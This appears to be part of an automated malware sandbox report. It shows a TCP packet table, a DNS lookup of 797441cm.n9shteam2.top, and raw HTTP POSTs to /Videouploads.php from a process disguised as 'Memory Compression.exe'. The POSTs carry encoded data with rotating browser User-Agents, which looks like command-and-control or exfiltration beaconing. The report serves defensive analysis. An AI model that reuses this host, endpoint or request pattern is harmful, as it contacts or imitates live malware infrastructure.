                                                  Jan 2, 2025 07:42:58.223143101 CET4974780192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:42:58.223350048 CET4974780192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:42:58.228096962 CET8049747185.158.202.52192.168.2.4
                                                  Jan 2, 2025 07:42:58.577889919 CET4974780192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:42:58.582746029 CET8049747185.158.202.52192.168.2.4
                                                  Jan 2, 2025 07:42:58.887072086 CET8049747185.158.202.52192.168.2.4
                                                  Jan 2, 2025 07:42:58.937108040 CET4974780192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:42:59.014481068 CET8049747185.158.202.52192.168.2.4
                                                  Jan 2, 2025 07:42:59.062129021 CET4974780192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:42:59.114819050 CET4974780192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:43:04.684660912 CET4978880192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:43:04.689515114 CET8049788185.158.202.52192.168.2.4
                                                  Jan 2, 2025 07:43:04.689598083 CET4978880192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:43:04.689801931 CET4978880192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:43:04.694588900 CET8049788185.158.202.52192.168.2.4
                                                  Jan 2, 2025 07:43:05.046686888 CET4978880192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:43:05.051868916 CET8049788185.158.202.52192.168.2.4
                                                  Jan 2, 2025 07:43:05.326363087 CET8049788185.158.202.52192.168.2.4
                                                  Jan 2, 2025 07:43:05.374608040 CET4978880192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:43:05.458293915 CET8049788185.158.202.52192.168.2.4
                                                  Jan 2, 2025 07:43:05.499617100 CET4978880192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:43:05.531322956 CET4978880192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:43:07.920547009 CET4980980192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:43:07.925410986 CET8049809185.158.202.52192.168.2.4
                                                  Jan 2, 2025 07:43:07.925478935 CET4980980192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:43:07.925662041 CET4980980192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:43:07.930433989 CET8049809185.158.202.52192.168.2.4
                                                  Jan 2, 2025 07:43:08.281053066 CET4980980192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:43:08.285901070 CET8049809185.158.202.52192.168.2.4
                                                  Jan 2, 2025 07:43:08.590106010 CET8049809185.158.202.52192.168.2.4
                                                  Jan 2, 2025 07:43:08.640347958 CET4980980192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:43:08.727977037 CET8049809185.158.202.52192.168.2.4
                                                  Jan 2, 2025 07:43:08.780951977 CET4980980192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:43:08.807364941 CET4980980192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:43:09.744429111 CET4982080192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:43:09.749286890 CET8049820185.158.202.52192.168.2.4
                                                  Jan 2, 2025 07:43:09.749361038 CET4982080192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:43:09.772655010 CET4982080192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:43:09.777404070 CET8049820185.158.202.52192.168.2.4
                                                  Jan 2, 2025 07:43:10.125345945 CET4982080192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:43:10.130234003 CET8049820185.158.202.52192.168.2.4
                                                  Jan 2, 2025 07:43:10.406136990 CET8049820185.158.202.52192.168.2.4
                                                  Jan 2, 2025 07:43:10.452740908 CET4982080192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:43:10.542355061 CET8049820185.158.202.52192.168.2.4
                                                  Jan 2, 2025 07:43:10.593381882 CET4982080192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:43:10.613226891 CET4982080192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:43:12.769150972 CET4984180192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:43:12.775981903 CET8049841185.158.202.52192.168.2.4
                                                  Jan 2, 2025 07:43:12.777087927 CET4984180192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:43:12.777729034 CET4984180192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:43:12.782562971 CET8049841185.158.202.52192.168.2.4
                                                  Jan 2, 2025 07:43:13.124891043 CET4984180192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:43:13.129668951 CET8049841185.158.202.52192.168.2.4
                                                  Jan 2, 2025 07:43:13.413958073 CET8049841185.158.202.52192.168.2.4
                                                  Jan 2, 2025 07:43:13.468390942 CET4984180192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:43:13.542433023 CET8049841185.158.202.52192.168.2.4
                                                  Jan 2, 2025 07:43:13.593398094 CET4984180192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:43:13.610966921 CET4984180192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:43:15.255688906 CET4985980192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:43:15.260504961 CET8049859185.158.202.52192.168.2.4
                                                  Jan 2, 2025 07:43:15.261086941 CET4985980192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:43:15.270199060 CET4985980192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:43:15.275017023 CET8049859185.158.202.52192.168.2.4
                                                  Jan 2, 2025 07:43:15.624830008 CET4985980192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:43:15.629766941 CET8049859185.158.202.52192.168.2.4
                                                  Jan 2, 2025 07:43:15.897964001 CET8049859185.158.202.52192.168.2.4
                                                  Jan 2, 2025 07:43:15.952759027 CET4985980192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:43:16.030421019 CET8049859185.158.202.52192.168.2.4
                                                  Jan 2, 2025 07:43:16.077756882 CET4985980192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:43:16.115370035 CET4985980192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:43:37.209327936 CET4999580192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:43:37.214153051 CET8049995185.158.202.52192.168.2.4
                                                  Jan 2, 2025 07:43:37.214212894 CET4999580192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:43:37.214448929 CET4999580192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:43:37.219180107 CET8049995185.158.202.52192.168.2.4
                                                  Jan 2, 2025 07:43:37.562329054 CET4999580192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:43:37.567224979 CET8049995185.158.202.52192.168.2.4
                                                  Jan 2, 2025 07:43:37.850827932 CET8049995185.158.202.52192.168.2.4
                                                  Jan 2, 2025 07:43:37.905922890 CET4999580192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:43:37.978218079 CET8049995185.158.202.52192.168.2.4
                                                  Jan 2, 2025 07:43:38.030939102 CET4999580192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:43:38.059993029 CET4999580192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:43:45.314692974 CET5001380192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:43:45.319629908 CET8050013185.158.202.52192.168.2.4
                                                  Jan 2, 2025 07:43:45.319813013 CET5001380192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:43:45.319977999 CET5001380192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:43:45.324740887 CET8050013185.158.202.52192.168.2.4
                                                  Jan 2, 2025 07:43:45.671842098 CET5001380192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:43:45.676688910 CET8050013185.158.202.52192.168.2.4
                                                  Jan 2, 2025 07:43:45.975331068 CET8050013185.158.202.52192.168.2.4
                                                  Jan 2, 2025 07:43:46.015322924 CET5001380192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:43:46.106070995 CET8050013185.158.202.52192.168.2.4
                                                  Jan 2, 2025 07:43:46.155937910 CET5001380192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:43:46.183118105 CET5001380192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:43:48.643342972 CET5001480192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:43:48.648191929 CET8050014185.158.202.52192.168.2.4
                                                  Jan 2, 2025 07:43:48.648276091 CET5001480192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:43:48.648454905 CET5001480192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:43:48.653193951 CET8050014185.158.202.52192.168.2.4
                                                  Jan 2, 2025 07:43:48.999847889 CET5001480192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:43:49.004679918 CET8050014185.158.202.52192.168.2.4
                                                  Jan 2, 2025 07:43:49.285562038 CET8050014185.158.202.52192.168.2.4
                                                  Jan 2, 2025 07:43:49.327933073 CET5001480192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:43:49.418426991 CET8050014185.158.202.52192.168.2.4
                                                  Jan 2, 2025 07:43:49.468542099 CET5001480192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:43:49.485307932 CET5001480192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:43:52.267887115 CET5001580192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:43:52.272845984 CET8050015185.158.202.52192.168.2.4
                                                  Jan 2, 2025 07:43:52.272927046 CET5001580192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:43:52.273149967 CET5001580192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:43:52.277978897 CET8050015185.158.202.52192.168.2.4
                                                  Jan 2, 2025 07:43:52.624927998 CET5001580192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:43:52.630033970 CET8050015185.158.202.52192.168.2.4
                                                  Jan 2, 2025 07:43:52.908746004 CET8050015185.158.202.52192.168.2.4
                                                  Jan 2, 2025 07:43:52.952837944 CET5001580192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:43:53.042171001 CET8050015185.158.202.52192.168.2.4
                                                  Jan 2, 2025 07:43:53.093476057 CET5001580192.168.2.4185.158.202.52
                                                  Jan 2, 2025 07:43:53.233520031 CET5001580192.168.2.4185.158.202.52

                                                  UDP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Jan 2, 2025 07:42:12.204611063 CET5539653192.168.2.41.1.1.1
                                                  Jan 2, 2025 07:42:12.213943005 CET53553961.1.1.1192.168.2.4

                                                  DNS Queries

                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Jan 2, 2025 07:42:12.204611063 CET192.168.2.41.1.1.10x70a4Standard query (0)797441cm.n9shteam2.topA (IP address)IN (0x0001)false

                                                  DNS Answers

                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Jan 2, 2025 07:42:12.213943005 CET1.1.1.1192.168.2.40x70a4No error (0)797441cm.n9shteam2.top185.158.202.52A (IP address)IN (0x0001)false

                                                  HTTP Request Dependency Graph

                                                  • 797441cm.n9shteam2.top

                                                  HTTP Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.449730185.158.202.52806924C:\Recovery\Memory Compression.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jan 2, 2025 07:42:12.228691101 CET273OUTPOST /Videouploads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: 797441cm.n9shteam2.top
                                                  Content-Length: 344
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Jan 2, 2025 07:42:12.578655005 CET344OUTData Raw: 00 06 01 01 06 00 04 02 05 06 02 01 02 03 01 0b 00 0b 05 00 02 0c 03 08 07 06 0d 06 04 02 03 02 0d 02 05 0a 02 56 06 55 0b 01 06 53 05 03 05 06 05 00 0d 0c 0f 00 07 0b 06 02 05 02 07 02 04 09 00 56 0f 01 07 53 04 07 0c 04 0b 0f 0f 03 0d 06 07 53
                                                  Data Ascii: VUSVSS\L}Q|NW]vqaMwf`~lawR`|Mc[oR]xcz}m^vdk^u~V@z}Prq
                                                  Jan 2, 2025 07:42:12.863842010 CET25INHTTP/1.1 100 Continue
                                                  Jan 2, 2025 07:42:12.998162985 CET376INHTTP/1.1 404 Not Found
                                                  Server: nginx
                                                  Date: Thu, 02 Jan 2025 06:42:09 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Content-Length: 213
                                                  Connection: keep-alive
                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                  Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1192.168.2.449737185.158.202.5280
                                                  TimestampBytes transferredDirectionData
                                                  Jan 2, 2025 07:42:40.034801960 CET326OUTPOST /Videouploads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                  Host: 797441cm.n9shteam2.top
                                                  Content-Length: 344
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Jan 2, 2025 07:42:40.390450954 CET344OUTData Raw: 05 06 01 02 06 0d 01 05 05 06 02 01 02 01 01 07 00 05 05 0b 02 00 03 01 07 0f 0e 04 03 05 01 04 0c 06 04 0f 00 50 07 04 0c 54 06 07 04 03 02 0f 05 00 0b 09 0f 02 07 0b 07 01 06 53 01 0b 07 00 01 01 0f 5c 06 0e 06 54 0c 02 0c 04 0a 06 0f 09 06 01
                                                  Data Ascii: PTS\TVRV\L}P^~wnYv\kR|j_tlw_h`pxl|_zsaY|}`CtYZOu~V@{}nL~r[
                                                  Jan 2, 2025 07:42:40.671520948 CET25INHTTP/1.1 100 Continue
                                                  Jan 2, 2025 07:42:40.802408934 CET376INHTTP/1.1 404 Not Found
                                                  Server: nginx
                                                  Date: Thu, 02 Jan 2025 06:42:37 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Content-Length: 213
                                                  Connection: keep-alive
                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                  Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2192.168.2.449738185.158.202.5280
                                                  TimestampBytes transferredDirectionData
                                                  Jan 2, 2025 07:42:47.244177103 CET308OUTPOST /Videouploads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                  Host: 797441cm.n9shteam2.top
                                                  Content-Length: 336
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Jan 2, 2025 07:42:47.593909025 CET336OUTData Raw: 00 02 01 00 03 08 01 03 05 06 02 01 02 05 01 01 00 02 05 09 02 05 03 0c 02 0e 0d 53 04 07 00 07 0e 07 06 0b 02 06 04 02 0e 05 05 00 00 07 05 00 04 07 0d 09 0d 50 01 02 01 04 06 50 06 06 07 5a 02 56 0a 0a 06 0e 07 51 0e 04 0e 07 0d 53 0c 07 05 06
                                                  Data Ascii: SPPZVQS[P\L}Th`[\c\[b[QPhUywwXkp|K{|Z_{`[Y~httlLi_~V@AxmrN~uy
                                                  Jan 2, 2025 07:42:47.888977051 CET25INHTTP/1.1 100 Continue
                                                  Jan 2, 2025 07:42:48.019974947 CET376INHTTP/1.1 404 Not Found
                                                  Server: nginx
                                                  Date: Thu, 02 Jan 2025 06:42:44 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Content-Length: 213
                                                  Connection: keep-alive
                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                  Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3192.168.2.449740185.158.202.5280
                                                  TimestampBytes transferredDirectionData
                                                  Jan 2, 2025 07:42:56.378424883 CET326OUTPOST /Videouploads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                  Host: 797441cm.n9shteam2.top
                                                  Content-Length: 344
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Jan 2, 2025 07:42:56.742400885 CET344OUTData Raw: 00 0b 01 05 06 0c 01 02 05 06 02 01 02 04 01 05 00 03 05 0e 02 01 03 00 02 06 0d 0d 04 53 02 03 0c 0e 07 09 03 02 06 56 0f 02 04 07 07 50 02 01 04 07 0f 09 0d 00 04 55 05 06 03 05 05 02 05 0e 05 03 0e 00 07 0f 04 03 0f 0f 0c 54 0a 01 0b 01 06 01
                                                  Data Ascii: SVPUTRV\L~czwrrYweZk|S`Ro]kpo[{os{sjkC`C`dtu~V@@{Sv~bW
                                                  Jan 2, 2025 07:42:57.033515930 CET25INHTTP/1.1 100 Continue
                                                  Jan 2, 2025 07:42:57.166054010 CET376INHTTP/1.1 404 Not Found
                                                  Server: nginx
                                                  Date: Thu, 02 Jan 2025 06:42:53 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Content-Length: 213
                                                  Connection: keep-alive
                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                  Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4192.168.2.449747185.158.202.5280
                                                  TimestampBytes transferredDirectionData
                                                  Jan 2, 2025 07:42:58.223350048 CET309OUTPOST /Videouploads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                  Host: 797441cm.n9shteam2.top
                                                  Content-Length: 344
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Jan 2, 2025 07:42:58.577889919 CET344OUTData Raw: 00 02 01 01 06 0a 01 01 05 06 02 01 02 03 01 05 00 01 05 0b 02 04 03 00 01 0f 0e 0c 07 01 00 06 0f 02 06 09 02 00 04 04 0f 06 07 0a 00 07 06 00 03 00 0d 09 0f 00 01 06 04 04 06 07 01 05 06 08 00 07 0c 0b 04 56 06 08 0f 07 0e 00 0e 0c 0c 55 05 0c
                                                  Data Ascii: VUZWU\L}R|c~@cqb]wupBkRaM`Bh~`tKxR{{^_Xh}^@cwliO~V@{S~L}rW
                                                  Jan 2, 2025 07:42:58.887072086 CET25INHTTP/1.1 100 Continue
                                                  Jan 2, 2025 07:42:59.014481068 CET376INHTTP/1.1 404 Not Found
                                                  Server: nginx
                                                  Date: Thu, 02 Jan 2025 06:42:55 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Content-Length: 213
                                                  Connection: keep-alive
                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                  Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5192.168.2.449788185.158.202.5280
                                                  TimestampBytes transferredDirectionData
                                                  Jan 2, 2025 07:43:04.689801931 CET273OUTPOST /Videouploads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: 797441cm.n9shteam2.top
                                                  Content-Length: 344
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Jan 2, 2025 07:43:05.046686888 CET344OUTData Raw: 00 01 01 02 06 01 04 02 05 06 02 01 02 0d 01 01 00 01 05 0e 02 06 03 0e 07 0f 0d 51 03 04 06 05 0f 56 06 09 00 53 06 57 0e 0a 04 53 07 05 04 04 07 04 0f 0d 0c 00 06 06 04 03 06 07 07 52 07 01 01 03 0d 0c 00 02 06 51 0c 05 0e 0e 0a 04 0d 51 06 02
                                                  Data Ascii: QVSWSRQQ\\L}Sk^POcrr\b[oU|bXc|`BhcpoBQK{cy_|~pww^~u~V@xS~}\i
                                                  Jan 2, 2025 07:43:05.326363087 CET25INHTTP/1.1 100 Continue
                                                  Jan 2, 2025 07:43:05.458293915 CET376INHTTP/1.1 404 Not Found
                                                  Server: nginx
                                                  Date: Thu, 02 Jan 2025 06:43:01 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Content-Length: 213
                                                  Connection: keep-alive
                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                  Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6192.168.2.449809185.158.202.5280
                                                  TimestampBytes transferredDirectionData
                                                  Jan 2, 2025 07:43:07.925662041 CET309OUTPOST /Videouploads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                  Host: 797441cm.n9shteam2.top
                                                  Content-Length: 344
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Jan 2, 2025 07:43:08.281053066 CET344OUTData Raw: 05 05 04 02 03 0f 04 05 05 06 02 01 02 0c 01 01 00 04 05 0b 02 04 03 0b 03 01 0a 04 04 54 02 02 0f 03 04 0f 02 06 05 06 0e 54 04 0a 07 56 07 00 03 05 0d 0b 0d 04 05 0b 04 02 06 53 07 04 04 0d 03 06 0a 0a 04 04 07 02 0c 01 0c 01 0a 0c 0d 09 06 05
                                                  Data Ascii: TTVSW\L}PkYvcbv]uKxh}wUw^|c]^oBcKzpX|m`vdt~u~V@xSTL}r}
                                                  Jan 2, 2025 07:43:08.590106010 CET25INHTTP/1.1 100 Continue
                                                  Jan 2, 2025 07:43:08.727977037 CET376INHTTP/1.1 404 Not Found
                                                  Server: nginx
                                                  Date: Thu, 02 Jan 2025 06:43:05 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Content-Length: 213
                                                  Connection: keep-alive
